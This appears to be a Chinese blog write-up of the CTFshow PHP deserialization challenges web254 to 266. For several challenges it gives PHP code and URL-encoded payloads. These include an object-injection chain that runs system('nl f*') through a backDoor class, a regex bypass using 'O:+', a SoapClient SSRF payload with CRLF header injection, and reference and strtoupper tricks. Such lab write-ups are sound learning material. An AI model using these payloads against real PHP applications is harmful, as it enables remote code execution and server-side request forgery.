【原创】CTFshow—反序列化(254—278)(持续更新)

头疼的序列化来了,想起被代码审计支配的恐惧,难受

web254

?username=xxxxxx&password=xxxxxx

还是有个小知识:Public Function 和 Function 的区别

web255

课代表来啦

<?phpclass ctfShowUser{    public $isVip=true;}echo serialize(new ctfShowUser);
O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}url编码payload:get:?username=xxxxxx&password=xxxxxxcookie:;user=O:11:"ctfShowUser":1:{s:5:"isVip"%3Bb:1%3B}

web256

课代表

别的和上面一样

<?phpclass ctfShowUser{    public $isVip=true;    public $username='x';}echo serialize(new ctfShowUser);
O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:1:"x";}url编码payload:get:?username=x&password=xxxxxxcookie:;user=O:11:"ctfShowUser":2:{s:5:"isVip"%3Bb:1%3Bs:8:"username"%3Bs:1:"x"%3B}

web257

课代表

__construct 当对象被创建的时候自动调用,对对象进行初始化。当所有的操作执行完毕之后,需要释放序列化的对象,触发__destruct () 魔术方法

php7.1 + 反序列化对类属性不敏感

本地序列化的时候将原属性 privat 改为 public 进行绕过即可

可见这篇文章 https://hellohy.top/huayang/711.html

思路就是发现可执行函数eval,要使用eval就要调用(执行)backDoor类中的getinfo,要调用getInfo就需要执行__destruct,因为魔法方法__construct()最后会释放序列化对象,当__destruct函数的对象所有引用都释放时执行__destruct函数
<?phpclass ctfShowUser{    public $class;    public function __construct(){        $this->class=new backDoor();    }}class backDoor{    public $code='system("nl f*");';}$b=new ctfShowUser();echo urlencode(serialize($b));
O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A16%3A%22system%28%22nl+f%2A%22%29%3B%22%3B%7D%7D

web258

有过滤了

[oc] --> 匹配内部某个字符\d --> 匹配数字+ --> 匹配至少一个

只需把上面生成的 O: 改为 O + 就行了

<?phpclass ctfShowUser{    public $class;    public function __construct(){        $this->class=new backDoor();    }}class backDoor{    public $code='system("nl f*");';}$b=new ctfShowUser();echo urlencode(str_replace('O:', 'O:+',serialize($b)));

web259

太难了给一下羽师傅的

<?php$target = 'http://127.0.0.1/flag.php';$post_string = 'token=ctfshow';$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));$a = serialize($b);$a = str_replace('^^',"\r\n",$a);echo urlencode($a);?>
O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A4%3A%22ssrf%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A128%3A%22wupco%0D%0AX-Forwarded-For%3A127.0.0.1%2C127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+13%0D%0A%0D%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

先传入访问一下

再访问 /flag.txt

推荐师傅文章:羽师傅
Y4tacker

web260

序列化后

web262

可以猜到是逃逸,但就是不会做

比月饼杯第一题难些

没了解过的可以去看看:https://hellohy.top/huayang/981.html

web265

使用引用

<?phpclass ctfshowAdmin{    public function login(){        return $this->token===$this->password;    }}$a = new ctfshowAdmin();$a->password=&$a->token;#引用echo urlencode(serialize($a));

web266

<?phpclass ctfshow{}$a=new ctfshow();echo strtoupper(serialize($a));
O:7:"CTFSHOW":0:{}

加上 strtoupperr 绕过正则

没有传参就去bp上用
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇